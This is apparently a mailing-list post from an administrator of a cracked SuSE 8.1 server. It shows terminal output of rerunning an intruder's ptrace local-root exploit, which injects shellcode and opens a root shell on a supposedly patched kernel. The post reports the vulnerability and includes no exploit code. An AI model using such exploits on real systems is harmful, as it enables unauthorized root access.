A SuSE 8.1 based server has been cracked, and the "visitor" left all his tools, so I've been able to play with it as well. The server was kept "up to date", but look at that:

om@box:~/tmp> uname -a
Linux box 2.4.19-4GB #1 Fri Sep 13 13:14:56 UTC 2002 i686 unknown
om@box:~/tmp> cat /etc/issue
Welcome to SuSE Linux 8.1 (i386) - Kernel \r (\l).
om@box:~/tmp> rpm -qa|grep k_
k_deflt-2.4.19-340
om@box:~/tmp> id
uid=400(om) gid=500(nofiles) groups=500(nofiles)
om@box:~/tmp> ./ptrace
[*] PID of Parent: 22768
[*] PID of Child: 22769
[*] Attaching to PID 22770
[*] Got registers!
[!] EIP: 0x4000eaed
[!] ESP: 0xbffffa48
[!] EBP: 0xffffffda
[!] EAX: 0xbffffa8c
[!] EBX: 0xbffffc74
[!] ECX: 0xbfffff7c
[!] EDX: 0x400130ec
[!] EDI: 0x00000000
[!] ESI: 0x400135fc
[*] Injecting shellcode (0x4000eaed)
[*] Detaching from PID 22770
[*] Voila baby, entering rootshell!
sh-2.05b# [*] waiting for SIGCHLD...
sh-2.05b# id
uid=0(root2) gid=0(root) groups=500(nofiles)
sh-2.05b#

Well... I thought that ptrace problem had been fixed...? (In SuSE 8.2 it's fine, the exploit is not working.)

Regards,
Olivier

--
_________________________________________________________________
Olivier Mueller - om@8304.ch - PGPkeyID: 0E84D2EA - Switzerland